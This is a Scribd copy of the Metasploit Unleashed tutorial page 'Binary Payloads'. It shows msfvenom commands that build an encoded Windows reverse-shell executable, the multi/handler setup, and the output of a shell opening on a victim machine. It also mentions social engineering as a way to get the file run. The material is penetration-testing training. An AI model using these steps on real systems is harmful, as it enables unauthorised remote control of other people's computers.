Scribd Logo
Importer

Bienvenue sur Scribd !

  • Binary Payloads - Metasploit Unleashed

    Transféré par

    marcusguita
    90 vues4 pages
    We will generate a reverse shell payload, execute it on a remote system, and get our shell.

    Copyright

    © © All Rights Reserved

    Formats disponibles

    PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    We will generate a reverse shell payload, execute it on a remote system, and get our shell.

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    90 vues4 pages

    Binary Payloads - Metasploit Unleashed

    Transféré par

    marcusguita
    We will generate a reverse shell payload, execute it on a remote system, and get our shell.

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 4

    09/01/2017

    BinaryPayloadsMetasploitUnleashed

    BinaryPayloads
    It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an
    executable from a Metasploit payload. This can be very useful in situations such as social engineering, if you
    can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any
    software.
    Lets look at a quick example of how to do this. We will generate a reverse shell payload, execute it on a
    remote system, and get our shell. To do this we will use the command line tool msfvenom. This command can
    be used for generating payloads to be used in many locations and o ers a variety of output options, from perl
    to C to raw. We are interested in the executable output, which is provided by the -f exe option.
    Well generate a Windows reverse shell executable that will connect back to us on port 31337.

    root@kali:~#msfvenompayloadoptionspwindows/shell/reverse_tcp
    Optionsforpayload/windows/shell/reverse_tcp:

    Name:WindowsCommandShell,ReverseTCPStager
    Module:payload/windows/shell/reverse_tcp
    Platform:Windows
    Arch:x86
    NeedsAdmin:No
    Totalsize:281
    Rank:Normal
    Providedby:
    spoonm
    sf
    hdm
    skape
    Basicoptions:
    NameCurrentSettingRequiredDescription

    EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)
    LHOSTyesThelistenaddress
    LPORT4444yesThelistenport
    Description:
    Spawnapipedcommandshell(staged).Connectbacktotheattacker

    root@kali:~#msfvenomax86platformwindowspwindows/shell/reverse_tcpLHOST=192.168.1.101LPORT=3333b"\
    Found1compatibleencoders
    https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/

    1/4

    09/01/2017

    BinaryPayloadsMetasploitUnleashed

    Attemptingtoencodepayloadwith1iterationsofx86/shikata_ga_nai
    x86/shikata_ga_naisucceededwithsize326(iteration=0)
    x86/shikata_ga_naichosenwithfinalsize326

    Payloadsize:326bytes
    Savedas:/tmp/1.exe
    root@kali:~#file/tmp/1.exe
    /tmp/1.exe:PE32executable(GUI)Intel80386,forMSWindows

    Ok, now we see we have a windows executable ready to go. Now, we will use multi/handler which is a stub
    that handles exploits launched outside of the framework.

    root@kali:~#msfconsoleq
    msf>useexploit/multi/handler
    msfexploit(handler)>showoptions
    Moduleoptions:
    NameCurrentSettingRequiredDescription

    Exploittarget:
    IdName

    0WildcardTarget

    When using the exploit/multi/handler module, we still need to tell it which payload to expect so we con gure
    it to have the same settings as the executable we generated.

    msfexploit(handler)>setpayloadwindows/shell/reverse_tcp
    payload=>windows/shell/reverse_tcp
    msfexploit(handler)>showoptions
    Moduleoptions:
    NameCurrentSettingRequiredDescription

    Payloadoptions(windows/shell/reverse_tcp):
    NameCurrentSettingRequiredDescription

    EXITFUNCthreadyesExittechnique:seh,thread,process
    LHOSTyesThelocaladdress
    LPORT4444yesThelocalport
    https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/

    2/4

    09/01/2017

    BinaryPayloadsMetasploitUnleashed

    Exploittarget:
    IdName

    0WildcardTarget

    msfexploit(handler)>setLHOST172.16.104.130
    LHOST=>172.16.104.130
    msfexploit(handler)>setLPORT31337
    LPORT=>31337
    msfexploit(handler)>

    Now that we have everything set up and ready to go, we run exploit for the multi/handler and execute our
    generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.

    msfexploit(handler)>exploit
    [*]HandlerbindingtoLHOST0.0.0.0
    [*]Startedreversehandler
    [*]Startingthepayloadhandler...
    [*]Sendingstage(474bytes)
    [*]Commandshellsession2opened(172.16.104.130:31337>172.16.104.128:1150)
    MicrosoftWindowsXP[Version5.1.2600]
    (C)Copyright19852001MicrosoftCorp.
    C:\DocumentsandSettings\Victim\MyDocuments>

    MSFUNavigation
    Metasploit Unleashed

    Donate Help Feed a Child

    Information Gathering

    Introduction

    Vulnerability Scanning

    Metasploit Fundamentals

    Writing a Simple Fuzzer

    Exploit Development

    Web App Exploit Dev

    Client Side Attacks

    Meterpreter Scripting

    Maintaining Access

    MSF Extended Usage

    Post Module Reference

    Auxiliary Module Reference

    https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/

    MSF Post Exploitation


    Metasploit GUIs

    Recent Changes

    3/4

    09/01/2017

    BinaryPayloadsMetasploitUnleashed

    https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/

    4/4

    Vous aimerez peut-être aussi